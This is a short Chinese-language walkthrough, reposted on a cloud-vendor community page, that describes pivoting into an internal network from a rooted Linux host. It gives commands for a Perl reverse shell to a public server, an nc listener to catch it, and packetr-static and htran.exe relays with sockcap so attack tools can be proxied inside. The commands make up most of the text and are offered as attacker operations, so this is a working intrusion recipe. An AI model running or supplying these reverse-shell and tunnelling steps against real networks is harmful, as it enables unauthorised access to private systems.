Linux下的內網反彈執行個體

來源:互聯網
上載者:User

環境:

被攻陷的Linux主機(拿到root許可權)-----類比為我內網的一台Linux伺服器 192.168.0.105

hack的操作用機-----我的電腦 192.168.1.101

反彈到公網的伺服器-----我自己的公網伺服器 61.160.2xx.xxx

滲透測試用的windows測試機   192.168.1.109

工具:

packetr-static   Linux下的

htran.exe windows下的

sockcap 用作代理進入內網滲透的利器

過程:

1.我類比下極度苛刻的情況下的環境,該攻陷的Linux伺服器對外不開放22,只存在web連接埠80,那麼我們必須得反彈shell到公網的機器上,這點我虛擬機器裡面沒 這個環境,我就直接說下簡要的

上傳back.pl檔案到linux下的tmp目錄下,執行

perl /tmp/back.pl xxx.xxx.xxx.xxx 連接埠

在公網的伺服器上,運行nc執行

nc -l -v -p 連接埠(跟上面的一樣)

現在我彈2個視窗回來,一個開代理,一個轉寄資料

把packetr-static傳上去,執行

./packetr-static -s 1988

一個視窗轉寄資料,執行

./packetr-static -slave 61.160.20x.xxx 123 127.0.0.1 1988

2.在windows公網端執行,

htran.exe -p -listen 123 1988

3.配置sockcap

4.運行代理程式進入內網

 

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.